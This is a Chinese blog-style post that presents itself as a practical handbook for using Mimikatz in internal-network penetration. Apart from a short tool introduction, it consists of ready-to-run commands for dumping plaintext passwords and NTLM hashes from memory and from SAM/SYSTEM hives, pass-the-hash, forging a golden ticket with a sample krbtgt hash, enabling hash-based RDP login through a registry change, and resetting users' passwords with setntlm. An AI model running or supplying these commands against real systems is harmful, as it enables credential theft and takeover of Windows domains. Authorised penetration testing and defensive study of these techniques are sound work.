内网渗透必备技能：精通Mimikatz的应用

前言

对于从事内网渗透的朋友们，Mimikatz这个工具相信大家都不会陌生。它在满足多种渗透场景下的需求上表现得尤为出色。在本文中，我根据利用场景整理了Mimikatz的常见用法，可作为内网渗透的实用手册。

工具简介

Mimikatz是法国安全研究员Benjamin Delpy开发的一款开源渗透工具，其源码托管在GitHub上。这个工具在渗透测试中的实用性和多功能性都得到了广泛的认可，而且支持对源码的二次开发。

功能

抓取密码1.1 获取内存中保存的明文密码或NTLM哈希arduinomimikatz "log" "privilege::debug" "sekurlsa::logonPasswords full" "exit"

1.2 读取SAM和SYSTEM文件中的NTLM-HASH导出两个文件：reg save hklm\sam sam.hive reg save hklm\system system.hive

使用Mimikatz执行：mimikatz.exe "log" "privilege::debug" "lsadump::sam /sam:sam.hive /system:system.hive" "exit" 或者mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

Hash传递如果已知某用户的Hash，可以制作该用户的票据，从而获取其权限，执行命令或登录3389：m.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:domain /ntlm:39d10c3f14ae465902b8b90823c119e5" exit

黄金票据通过伪造的TGT（Ticket Granting Ticket）制作Golden Ticket，获得域内的最高权限：mimikatz.exe "kerberos::golden /user:administrator /domain:test.com /sid:S-1-5-21-3759118954-2993291187-3577547808 /krbtgt:c3d5042c67ef5f461d0ba6ec233449 /ptt" exit 列出当前的所有票据：klist / kerberos::list 清空票据：klist purge

Hash登录RDP利用Hash登录3389，适用于只有Hash而无法直接登录的情况：4.1 修改注册表：REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 4.2 利用Hash登录：privilege::debug sekurlsa::pth /user:dorsa /domain:ort-x /ntlm:5c72b406b62703b2216589a90ff7e55e "/run:mstsc.exe /restrictedadmin"

SetNTLM Hash适用于仅知道用户NTLM哈希但无法解密出明文密码的情况。修改用户密码，并在使用后恢复用户原密码：登录目标系统后，还原目标密码：lsadump::setntlm /server:<DC's_IP_or_FQDN> /user:<username> /password:<new_password> 或lsadump::setntlm /server:<DC's_IP_or_FQDN> /user:<username> /ntlm:<Original_Hash>